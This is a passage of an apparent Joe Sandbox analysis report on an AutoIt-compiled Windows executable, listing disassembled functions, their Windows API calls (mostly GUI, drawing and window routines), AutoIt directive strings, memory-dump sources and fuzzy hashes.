                                                                              • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                              Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                              • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                              • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                              • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                              Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                              • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                              • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                              • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                              Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                              • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                              • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                              • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                              Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                              • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                              • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                              • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                              Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                              • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                              • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                              • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                              Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                              • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                              • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                              • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                              Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                              • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                              • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                              • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                              Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                              • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                              • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                              • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                              Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 004593D7
                                                                              • DeleteObject.GDI32(?), ref: 004593F1
                                                                              • DestroyWindow.USER32(?), ref: 00459407
                                                                              • GetDesktopWindow.USER32 ref: 0045942A
                                                                              • GetWindowRect.USER32(00000000), ref: 00459431
                                                                              • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                              • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                              • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                              • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                              • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                              • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                              • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                              • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                              • _wcslen.LIBCMT ref: 00459800
                                                                              • _wcscpy.LIBCMT ref: 0045981F
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                              • GetDC.USER32(?), ref: 004598DE
                                                                              • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                              • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                              • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 4040870279-2373415609
                                                                              • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                              • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                              • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                              • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                              Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00441E64
                                                                              • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                              • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                              • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                              • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                              • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                              • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                              • DeleteObject.GDI32(?), ref: 00441F1B
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                              • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                              • String ID:
                                                                              • API String ID: 69173610-0
                                                                              • Opcode ID: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                                                                              • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                              • Opcode Fuzzy Hash: d218d880d346c1ecbf0f5b9b78a982ad3551f5cf8a2409a8dc6e180da7254fc7
                                                                              • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                              Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-3360698832
                                                                              • Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                                              • Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
                                                                              • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                                              Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                              • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                              • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                              • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                              • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                              • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                              • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                              • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                              • SelectObject.GDI32(?,?), ref: 00433E29
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                              • GetWindowLongW.USER32 ref: 00433E8A
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                              • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                              • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                              • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                              • SelectObject.GDI32(?,?), ref: 00433F63
                                                                              • DeleteObject.GDI32(?), ref: 00433F70
                                                                              • SelectObject.GDI32(?,?), ref: 00433F78
                                                                              • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                              • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                              • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1582027408-0
                                                                              • Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                              • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                              • Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                              • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                              Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00456692
                                                                              • GetDesktopWindow.USER32 ref: 004566AA
                                                                              • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                              • DestroyWindow.USER32(?), ref: 00456731
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                              • IsWindowVisible.USER32(?), ref: 00456812
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                              • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                              • GetMonitorInfoW.USER32 ref: 00456894
                                                                              • CopyRect.USER32(?,?), ref: 004568A8
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
